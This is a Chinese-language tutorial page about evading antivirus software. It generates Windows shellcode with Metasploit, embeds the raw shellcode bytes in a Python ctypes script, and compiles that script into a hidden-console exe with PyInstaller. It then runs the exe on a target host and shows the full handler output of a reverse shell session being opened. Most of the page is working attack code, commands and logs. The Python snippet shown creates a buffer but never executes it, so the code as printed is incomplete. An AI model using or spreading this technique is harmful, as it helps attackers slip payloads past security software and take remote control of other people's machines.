Metasploit - Tips for Evading Anti-Virus
绕过杀毒软件,有许多钟方法。此处介绍一种,编写python程序调用shellcode,并使用Pyinstaler将python程序编译为exe程序。 |
准备工作:(Windows XP环境下编译) |
将Python程序编译为exe,需要Python主程序,pywin32库,Pyinstaller(直接解压到C盘)。如果编译过程中出现错误提示,请按照指示解决问题。安装过程不是很复杂,在此不予说明。 |
https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz |
利用metasploit生成shellcode,供后面的python程序使用。 |
msf payload(shell_bind_tcp) > show options Module options (payload/windows/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique (accepted: seh, thread, process, none) LPORT 4444 yes The listen port RHOST 0.0.0.0 no The target address msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c [*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt... |
准备完成后,python程序源码如下: |
from ctypes import *
shellcode = '\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x6b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3' memorywithshell = create_string_buffer(shellcode, len(shellcode)) |
利用Pyinstaller编译上述包含shellcode的python文件,命令如下: |
C:\PyInstaller-2.1\utils>pythonmakespec.py --onefile --noconsole shellcode.py |
wrote C:\PyInstaller-2.1\utils\shellcode.spec now run pyinstaller.py to build the executable |
C:\PyInstaller-2.1\utils>pythonbuild.py shellcode.spec |
59 INFO: Testing for ability to set icons, version resources... 69 INFO: ... resource update available 79 INFO: UPX is not available. 109 INFO: Processing hook hook-os 259 INFO: Processing hook hook-time 259 INFO: Processing hook hook-cPickle 349 INFO: Processing hook hook-_sre 509 INFO: Processing hook hook-cStringIO 639 INFO: Processing hook hook-encodings 660 INFO: Processing hook hook-codecs 1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils 1171 INFO: checking Analysis 1171 INFO: building Analysis because out00-Analysis.toc non existent 1171 INFO: running Analysis out00-Analysis.toc 1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable 1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1171 WARNING: Assembly not found 1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found 1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe 1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1230 WARNING: Assembly not found 1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found 1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll 1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py 1381 INFO: Processing hook hook-os 1401 INFO: Processing hook hook-site 1421 INFO: Processing hook hook-encodings 1562 INFO: Processing hook hook-time 1562 INFO: Processing hook hook-cPickle 1661 INFO: Processing hook hook-_sre 1822 INFO: Processing hook hook-cStringIO 1961 INFO: Processing hook hook-codecs 2463 INFO: Processing hook hook-pydoc 2632 INFO: Processing hook hook-email 2713 INFO: Processing hook hook-httplib 2763 INFO: Processing hook hook-email.message 2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py 2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py 2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py 3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py 3043 INFO: Analyzing shellcode.py 3114 INFO: Hidden import 'codecs' has been found otherwise 3114 INFO: Hidden import 'encodings' has been found otherwise 3114 INFO: Looking for run-time hooks 3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd 3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd 3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd 3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd 3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd 3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd 3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd 3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll 3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt 3634 INFO: checking PYZ 3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing 3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc 4815 INFO: checking PKG 4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing 4815 INFO: building PKG (CArchive) out00-PKG.pkg 6167 INFO: checking EXE 6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing 6167 INFO: building EXE from out00-EXE.toc 6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe |
编译完成后,将shellcode.exe放到目标主机上执行,成功获取反弹shell。 |
msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 msf exploit(handler) > run [*] Started reverse handler on 192.168.1.107:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 192.168.1.112 [*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\PyInstaller-2.1\utils> |
参考链接:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/
Metasploit - Tips for Evading Anti-Virus相关推荐
- BlackArch-Tools
BlackArch-Tools 简介安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 B ...
- TRex 学习 (4) ---- stateful ( advanced )
为什么80%的码农都做不了架构师?>>> stateful 是一种有状态的发包,虽然基于包模板进行顺序发送,但对于DUT来说是一个有状态的连接,因此它可以用在我们很多的测试场景 ...
- AVG杀毒软件添加信任程序
AVG杀毒软件总是会将一些程序当做病毒.为避免这种情况,我们可以讲被误当做病毒的程序添加到信任程序列表中. 1. 打开工具->高级设置: 2. 选择Anti - Virus -> Resi ...
- 干货|各种WAF绕过手法学习
0X00 Fuzz/爆破 fuzz字典 1.Seclists/Fuzzing https://github.com/danielmiessler/SecLists/tree/master/Fuz ...
- 经典利用永恒之蓝漏洞对Windows操作系统进行攻击
利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...
- 网络安全之防病毒网关
目录 网络安全之防病毒网关 恶意软件 按照传播方式分类 病毒 蠕虫 木马 按照功能分类 后门 勒索 挖矿 恶意代码的特征 下载特征 后门特征 信息收集特征 自身感染特性 文件感染特性 网络攻击特性 病 ...
- 【win11】关闭 Windows 安全中心中的Defender 防病毒保护
win11 的 默认defender 会把 beyond compare的一些 crack dll 识别含有木马 无奈,只能关闭了. 关闭 Windows 安全中心中的Defender 防病毒保护 关 ...
- 内网渗透(九)之内网信息收集-手动本地信息收集
前言 不管是在外网中还是在内网中,信息收集都是重要的第一步.对于内网中的一台机器,其所处内网的结构是什么样 的.其角色是什么.使用这台机器的人的角色是什么,以及这台机器上安装了什么杀毒软件.这台机器是 ...
- 遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...
# zTian.red:绕过卡巴斯基.360安全卫士.Windows Defender动态执行CS.MSF命令... 测试目标:Windows Defender.卡巴斯基.360安全卫士极速版 系统环 ...
最新文章
- 如何从头开始构建自己的Linux Dotfiles Manager
- eclipse中使用svn提交,更新代码。
- 45个案例一一破解win32k.sys蓝屏
- The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
- 字节跳动的首款获批游戏曝光 原来是这个
- 阿里正式进军机器人赛道,首款物流机器人“小蛮驴”来了!
- ISO 27001:2022 中文试译稿
- pc端和移动端的区别
- python实现触摸精灵功能_FRIDA脚本系列(三)超神篇:百度AI“调教”抖音AI
- ChinaITLab Linux实战工程师网校课程-8CD
- 剪切蒙版与抠图的结合
- jwplayer +ffmpeg+red5 实现摄像头的直播
- TLS1.2的握手过程——从代码角度
- 小白的JAVA学习笔记(九)---异常处理(try/catch/finally,ducking)
- 图形学---中点画线法---opengl中实现
- 信管家源代码c语言,AK老唐信管家软件指标 火车轨系统指标源码
- 迅雷超级会员和白金会员怎么买最便宜多少钱一年多少钱一个月
- vue百度地图 一进页面加载卫星图
- 领扣--唯一摩尔斯密码
- 使用ThinkPHP操作数据库